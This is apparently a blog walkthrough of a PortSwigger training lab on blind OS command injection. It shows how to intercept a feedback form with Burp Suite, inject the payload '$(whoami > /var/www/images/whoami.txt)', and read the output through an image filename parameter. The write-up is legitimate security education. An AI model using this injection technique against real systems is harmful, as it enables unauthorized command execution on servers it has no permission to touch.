In this post, we’re going to solve the PortSwigger lab: “Blind OS command injection with output redirection”.

PortSwigger lab start page

To solve the lab, we need to execute the whoami command on the server and read its output. To do this, we’ll use a Blind OS Command Injection found in the feedback function.

Submit feedback button on the page

Feedback form with fields to fill

As we can see, there are several fields to fill out. So let’s fill them in:

Completed form fields

Now, before submitting the feedback, we prepare Burp Suite to receive the requests:

Proxy configuration in browser

Activating interception in Burp Suite

With this ready, we submit the feedback to capture the request:

Submitting the feedback form

Request intercepted in Burp Suite

This is the request that’s sent to the server when submitting feedback. To handle it, we send it to the repeater by pressing Ctrl R:

Request sent to Burp Suite Repeater

Once in the repeater, we can observe how a valid request simply gets a 200 status response and not much else.

However, among all the parameters being sent, we’re going to try to see if we can execute a command in any of them, and not only that, but also redirect the output to a directory we can access. This way, we can read the output of the command we’ve executed.

The first thing is to determine which directory we can redirect the command output to. For this, in this case, we’re going to use the directory where images are stored, which in this case is indicated in the lab description:

  • /var/www/images

Knowing this, we’re going to try to perform a Blind OS Command Injection by redirecting the command output to a file in the directory above:

Whoami command injection with output redirection

$(whoami > /var/www/images/whoami.txt)

Since this is a Blind OS Command Injection, we can’t see the output in the server’s response. So to confirm if it worked, we’ll need to access the file to which we’ve redirected the command output.

To access the file in question, since we’ve placed it in a folder called “images”, we can assume that it might have been saved in the same path as, for example, the images of product covers on the website:

Accessing a product image

Image URL showing the filename parameter

Images are accessed through the filename parameter of the image file, so we’re going to replace the value of this parameter with the name of the file to which we’ve redirected the command output, in this case, whoami.txt:

Successful reading of the whoami.txt file

In this way, we manage to solve the lab:

Lab completed successfully

Share on X Share on LinkedIn Share on Telegram
Comment on Discord Visit the author page